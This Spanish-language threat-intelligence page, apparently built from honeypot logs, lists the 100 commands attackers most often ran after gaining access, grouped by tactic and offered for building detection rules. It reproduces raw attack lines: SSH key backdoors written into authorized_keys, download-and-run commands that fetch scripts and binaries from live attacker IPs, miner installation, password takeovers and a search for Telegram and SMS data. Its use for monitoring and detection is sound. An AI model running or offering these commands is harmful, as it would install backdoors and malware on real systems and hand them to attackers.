Actualizado: febrero de 2026

Top 100 Comandos Maliciosos

Los comandos mas ejecutados por atacantes tras obtener acceso a sistemas. Util para deteccion de intrusiones y respuesta a incidentes.

14.704 comandos en 24h

$Enter new UNIX password:

410 IPs1129x

$lockr -ia .ssh

484 IPs781x

$cd ~; chattr -ia .ssh; lockr -ia .ssh

434 IPs646x

cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

423 IPs627x

$cat /proc/cpuinfo | grep name | wc -l

423 IPs626x

$uname -a

411 IPs626x

$uname -m

409 IPs614x

$uname

410 IPs613x

$whoami

406 IPs605x

10.

$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

415 IPs604x

11.

$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

409 IPs604x

12.

$crontab -l

400 IPs596x

13.

$cat /proc/cpuinfo | grep model | grep name | wc -l

400 IPs595x

14.

$lscpu | grep Model

392 IPs587x

15.

$top

398 IPs585x

16.

$w

396 IPs582x

17.

$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

394 IPs573x

18.

$which ls

394 IPs567x

19.

$ls -lh $(which ls)

371 IPs514x

20.

$uname -s -v -n -m 2 > /dev/null

126 IPs412x

21.

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version

117 IPs363x

22.

$cat /proc/uptime 2 > /dev/null | cut -d. -f1

46 IPs228x

23.

rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

126 IPs129x

24.

$uname -m 2 > /dev/null

46 IPs119x

25.

$/bin/./uname -s -v -n -r -m

16 IPs49x

26.

$uname -s -v -n -r -m

14 IPs30x

27.

$then

4 IPs13x

28.

$if [ [ ! -d ${HOME}/.ssh ] ]

4 IPs13x

29.

$nproc

4 IPs12x

30.

cd /data/local/tmp/; wget http://140.233.190.82/cat.sh || curl http://140.233.190.82/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android

4 IPs9x

31.

$echo "$(getprop ro.product.name 2>/dev/null) $(whoami 2>/dev/null)"

2 IPs9x

32.

$pm path com.ufo.miner

4 IPs8x

33.

$fi

2 IPs7x

34.

$echo SCANNER_TEST

7 IPs7x

35.

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -qO- http://139.59.119.89/ohshit.sh | sh; curl -s http://139.59.119.89/ohshit.sh | sh; wget http://139.59.119.89/ohshit.sh -O ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp 139.59.119.89 -c get ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp -r ohshit2.sh -g 139.59.119.89; chmod 777 ohshit2.sh; sh ohshit2.sh; ftpget -v -u anonymous -p anonymous -P 21 139.59.119.89 ohshit1.sh ohshit1.sh; sh ohshit1.sh; rm -rf ohshit.sh ohshit2.sh

7 IPs7x

36.

$rm -rf /data/local/tmp/*

2 IPs6x

37.

cd /data/local/tmp 2>/dev/null||cd /tmp 2>/dev/null||cd /cache;rm -f kla.sh;(wget -qO kla.sh http://45.148.120.23/bins/kla.sh 2>/dev/null||busybox wget -qO kla.sh http://45.148.120.23/bins/kla.sh 2>/dev/null||curl -sLo kla.sh http://45.148.120.23/bins/kla.sh 2>/dev/null||nc 45.148.120.23 3342 >kla.sh 2>/dev/null);[ -s kla.sh ]&&chmod +x kla.sh 2>/dev/null&&nohup sh kla.sh tbk >/dev/null 2>&1 &

2 IPs4x

38.

$Accept-Encoding: gzip

1 IPs4x

39.

$/ip cloud print

3 IPs4x

40.

$rm -f /data/local/tmp/ufo.apk

3 IPs4x

41.

$am start -n com.ufo.miner/com.example.test.MainActivity

2 IPs4x

42.

ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

4 IPs4x

43.

$ps | grep trinity

2 IPs4x

44.

$echo Hi | cat -n

4 IPs4x

45.

$chmod 0755 /data/local/tmp/nohup

2 IPs3x

46.

$/data/local/tmp/nohup /data/local/tmp/trinity

2 IPs3x

47.

$chmod 0755 /data/local/tmp/trinity

2 IPs3x

48.

$/data/local/tmp/nohup su -c /data/local/tmp/trinity

2 IPs3x

49.

$locate D877F783D5D3EF8Cs

3 IPs3x

50.

$ifconfig

3 IPs3x

51.

cd /data/local/tmp/; rm -rf arm7; busybox wget http://130.12.180.20:34029/arm7 -O arm7; chmod 777 arm7; ./arm7; busybox curl http://130.12.180.20:34029/arm7 -o arm7; chmod 777 arm7; ./arm7

2 IPs2x

52.

cd /data/local/tmp/; busybox wget http://130.12.180.124/rq0anbhkd976/assets/js/o5a0j5tug8?token=PeOtaCY5NmzmOSDVm0BX9UDM8lJijstK; chmod 777 o5a0j5tug8; ./o5a0j5tug8

1 IPs2x

53.

cd /data/local/tmp && busybox wget http://130.12.180.20:36695/dlr.arm7 -O arm7 2>/dev/null || curl -s http://130.12.180.20:36695/dlr.arm7 -o arm7 2>/dev/null && chmod 777 arm7 2>/dev/null && ./arm7; chmod 777 dvrHelper;./dvrHelper route

1 IPs2x

54.

$Accept-Encoding: gzip, deflate

1 IPs2x

55.

wget http://130.12.182.211:25196/download.sh; sh download.sh; curl http://130.12.182.211:25196/c.sh; sh c.sh; wget http://130.12.182.211:25196/download.sh; sh download.sh; curl http://130.12.182.211:25196/download.sh; sh download.sh; busybox wget http://130.12.182.211:25196/download.sh; sh download.sh; busybox curl http://130.12.182.211:25196/download.sh; sh download.sh

2 IPs2x

56.

$cat /proc/cpuinfo

2 IPs2x

57.

$uname -s -m

2 IPs2x

58.

$system

1 IPs2x

59.

$Accept: */*

1 IPs2x

60.

$shell

1 IPs2x

61.

$q

1 IPs2x

62.

$ps | grep xig

1 IPs2x

63.

$ps -ef | grep '[Mm]iner'

2 IPs2x

64.

$pm install /data/local/tmp/ufo.apk

1 IPs2x

65.

$ps aux | head -10

2 IPs2x

66.

$ps | grep '[Mm]iner'

2 IPs2x

67.

$Connection: keep-alive

1 IPs2x

68.

$echo -e "Hadoop\nhFRCroxssY1h\nhFRCroxssY1h"|passwd|bash

1 IPs2x

69.

$echo -e "P@ssw0rd\n4FIq50IPJb50\n4FIq50IPJb50"|passwd|bash

1 IPs2x

70.

$echo "P@ssw0rd\n4FIq50IPJb50\n4FIq50IPJb50\n"|passwd

1 IPs2x

71.

$echo "root:jL1LzwxX7JxA"|chpasswd|bash

2 IPs2x

72.

$echo "12345678\nlpzp5txcgFjf\nlpzp5txcgFjf\n"|passwd

1 IPs1x

73.

$echo "12345678\nBp492URa4qcI\nBp492URa4qcI\n"|passwd

1 IPs1x

74.

$echo "12345678\n7eimHntIQKsR\n7eimHntIQKsR\n"|passwd

1 IPs1x

75.

$echo "12345678\n4U2xqLV4aPJs\n4U2xqLV4aPJs\n"|passwd

1 IPs1x

76.

arch_info=$(uname -m);             cpu_count=$(nproc);             echo -e "SP2NOvnB\nSP2NOvnB" | passwd > /dev/null 2>&1;             if [[ ! -d "${HOME}/.ssh" ]]; then;                 mkdir -p "${HOME}/.ssh" >/dev/null 2>&1;             fi;             touch "${HOME}/.ssh/authorized_keys" 2>/dev/null;             echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk

1 IPs1x

77.

$echo "1234567890\nLhrF2i6JfMZv\nLhrF2i6JfMZv\n"|passwd

1 IPs1x

78.

$echo "12341234\nToykMXVvFCEv\nToykMXVvFCEv\n"|passwd

1 IPs1x

79.

$echo "123321\nSJ7oTLYeAMCC\nSJ7oTLYeAMCC\n"|passwd

1 IPs1x

80.

$echo "123321\nRUpeh9tuqw3v\nRUpeh9tuqw3v\n"|passwd

1 IPs1x

81.

arch_info=$(uname -m);             cpu_count=$(nproc);             echo -e "L435vfVF\nL435vfVF" | passwd > /dev/null 2>&1;             if [[ ! -d "${HOME}/.ssh" ]]; then;                 mkdir -p "${HOME}/.ssh" >/dev/null 2>&1;             fi;             touch "${HOME}/.ssh/authorized_keys" 2>/dev/null;             echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk

1 IPs1x

82.

$echo "123123\nP1OUW6T29tS6\nP1OUW6T29tS6\n"|passwd

1 IPs1x

83.

$echo "123123123\nwFvHhFrIHxtg\nwFvHhFrIHxtg\n"|passwd

1 IPs1x

84.

$echo "123123123\nmXEz2gAp8d4V\nmXEz2gAp8d4V\n"|passwd

1 IPs1x

85.

$echo "123!@#$\nfZ1nfmnNzyUW\nfZ1nfmnNzyUW\n"|passwd

1 IPs1x

86.

$echo "121212\nhUxxa3cXY2Mb\nhUxxa3cXY2Mb\n"|passwd

1 IPs1x

87.

$echo "1234\n0m0oR15npzag\n0m0oR15npzag\n"|passwd

1 IPs1x

88.

$echo "111\nWyca6qXhOXbT\nWyca6qXhOXbT\n"|passwd

1 IPs1x

89.

$echo "12345\nyFBni1aNlrH2\nyFBni1aNlrH2\n"|passwd

1 IPs1x

90.

$echo "12345\nrytFhURvpewr\nrytFhURvpewr\n"|passwd

1 IPs1x

91.

$echo "111\n3ynuIbVmzNZc\n3ynuIbVmzNZc\n"|passwd

1 IPs1x

92.

$echo "111111\nBlcbyJCuNf89\nBlcbyJCuNf89\n"|passwd

1 IPs1x

93.

$cat /proc/mounts; /bin/busybox WYJYX

1 IPs1x

94.

arch_info=$(uname -m);             cpu_count=$(nproc);             echo -e "GhheRrmj\nGhheRrmj" | passwd > /dev/null 2>&1;             if [[ ! -d "${HOME}/.ssh" ]]; then;                 mkdir -p "${HOME}/.ssh" >/dev/null 2>&1;             fi;             touch "${HOME}/.ssh/authorized_keys" 2>/dev/null;             echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk

1 IPs1x

95.

$echo "12345\nn8CDWUMlZF5p\nn8CDWUMlZF5p\n"|passwd

1 IPs1x

96.

$echo "12345\nsYCsNkBx7qUR\nsYCsNkBx7qUR\n"|passwd

1 IPs1x

97.

$echo "12345\nkHeoaREQ9cBH\nkHeoaREQ9cBH\n"|passwd

1 IPs1x

98.

$echo "12345\nygGFRmU2Rz5K\nygGFRmU2Rz5K\n"|passwd

1 IPs1x

99.

$echo "12345\nRoWtKDmzK8xw\nRoWtKDmzK8xw\n"|passwd

1 IPs1x

100.

$echo "12345\nMdFMfwMeN7Rd\nMdFMfwMeN7Rd\n"|passwd

1 IPs1x

Reconocimiento

uname, whoami, cat /etc/passwd

Descarga

wget, curl, tftp

Persistencia

crontab, chmod, chattr

Mov. Lateral

ssh, scp, ping

Uso para Deteccion

Estos comandos pueden usarse para crear reglas de deteccion en SIEM, IDS/IPS, y sistemas de monitorizacion. Monitoriza estos patrones en tus logs para detectar intrusiones.